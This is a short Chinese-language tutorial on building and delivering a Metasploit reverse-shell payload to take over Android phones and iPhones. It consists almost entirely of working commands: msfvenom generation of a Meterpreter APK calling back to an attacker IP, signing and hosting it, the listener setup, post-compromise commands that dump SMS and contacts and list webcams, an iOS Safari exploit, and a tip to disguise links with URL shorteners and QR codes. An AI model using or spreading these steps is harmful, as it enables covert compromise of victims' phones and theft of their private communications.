msf生成安卓渗透

利用msf来hack android

1.msfvenom -p android/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=4444 -o test.apk

2.签名（可以不用）

1.keytool -genkey -v -keystore my-release-key.keystore -alias pentest -keyalg RSA -keysize 2048 -validity 10000

 

2.jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore pentest.apk pentest

 

3.jarsigner -verify -verbose -certs pentest.apk   

3.下载hfs server

4.wine hfs.exe

5.msf下 use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost 10.10.10.128

set lport 4444

exploit

6.hfs下填入自己的ip，然后上传test.apk

7.在android安装并运行test.apk后msf进入meterpreter，在其下的命令跟linux命令很像

help  --查看可以使用的命令

sysinfo --查看当前系统信息

check_root --查看时候root

dump_sms --导出短信记录

dump_contacts --导出通话记录

webcam_list --查看摄像头列表

 

 

利用msf来hack iphone

use exploit/apple_ios/browser/safari_libtiff

set upipath /ipwn

set payload osx/armle/execute/reverse_tcp

set lhost 10.10.10.128

set lport 4444

exploit

利用armitage来hack iphone

基本方法与上面的相同

ps：https://bitly.com/ 将网址转换一下

二维码解析

短网址还原

 

 

注：在exploit下才可以sessions -l 来查看session